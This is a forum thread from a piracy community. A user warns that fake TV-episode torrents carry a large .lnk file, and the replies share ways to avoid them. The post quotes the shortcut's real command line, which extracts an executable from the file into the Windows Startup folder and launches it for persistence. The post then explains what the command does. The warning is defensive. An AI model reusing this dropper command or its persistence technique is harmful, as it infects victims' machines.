this post was submitted on 26 Feb 2025
92 points (100.0% liked)

Piracy: ꜱᴀɪʟ ᴛʜᴇ ʜɪɢʜ ꜱᴇᴀꜱ

57474 readers
678 users here now

⚓ Dedicated to the discussion of digital piracy, including ethical problems and legal advancements.

Rules • Full Version

1. Posts must be related to the discussion of digital piracy

2. Don't request invites, trade, sell, or self-promote

3. Don't request or link to specific pirated titles, including DMs

4. Don't submit low-quality posts, be entitled, or harass others

Loot, Pillage, & Plunder

📜 c/Piracy Wiki (Community Edition):

🏴‍☠️ Other communities

Torrenting:

Gaming:

💰 Please help cover server costs.

Ko-Fi Liberapay
Ko-fi Liberapay

founded 2 years ago
MODERATORS
db0@lemmy.dbzer0.com
sunbrothersco@lemmy.dbzer0.com
dataprolet@lemmy.dbzer0.com
Flatworm7591@lemmy.dbzer0.com
RandomLegend@lemmy.dbzer0.com
Andromxda@lemmy.dbzer0.com
CosmicTurtle0@lemmy.dbzer0.com
tenchiken@lemmy.dbzer0.com
92
Malware Warning on video files (midwest.social)
submitted 1 day ago by DemBoSain@midwest.social to c/piracy@lemmy.dbzer0.com
10 comments fedilink hide all child comments
 

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

top 10 comments
sorted by: hot top controversial new old
[–] AHorseWithNoNeigh@lemmy.dbzer0.com 34 points 1 day ago

See these all the time, unfortunately. I just add a line in the torrent client to not download anything with that file extension.

[–] Comexs@lemmy.zip 29 points 1 day ago

PSA/HOWTO: Avoid fake mkv torrents. Avoid getting hacked

[–] LiveLM@lemmy.zip 3 points 1 day ago* (last edited 1 day ago)

This is why I fear plugging public trackers into the arr stack.
Would be nice if Sonarr could ignore any torrents available before an episode's listed air date

[–] otto@sh.itjust.works 14 points 1 day ago

I’ve been noticing these around. Sonar catches them and I just delete them and research. I found that it’s often for the next weeks episode of a show. Only days after the previous episode came out. So it’s easy to see something that looks suspect anyway.

[–] Biskii@lemmy.dbzer0.com 10 points 1 day ago

Thank you for the heads up!

[–] AmbiguousProps@lemmy.today 6 points 1 day ago

I luckily haven't encountered these yet, but I primarily use NZB

[–] tabel2@lemmy.wtf 4 points 1 day ago

If there is one that is smaller than 950MB, it would be interesting if you uploaded it to a cloud sandbox analyzer like Any.Run, Triage, or some other similar service.

[–] piccolo@sh.itjust.works 3 points 1 day ago (2 children)

laughs in linux

[–] fubbernuckin@lemmy.dbzer0.com 12 points 1 day ago

You laugh in Linux now, but just wait until the year of the Linux desktop comes. Every malware developer on earth will be knocking on our door.

[–] Berstrrs@lemmy.dbzer0.com -1 points 1 day ago

I only laugh in Linux cause it's just the same anology as driving Dodge Ram in Europe - good luck finding spare parts.

At the same time VW Golf parts are sold almost in every convenience store.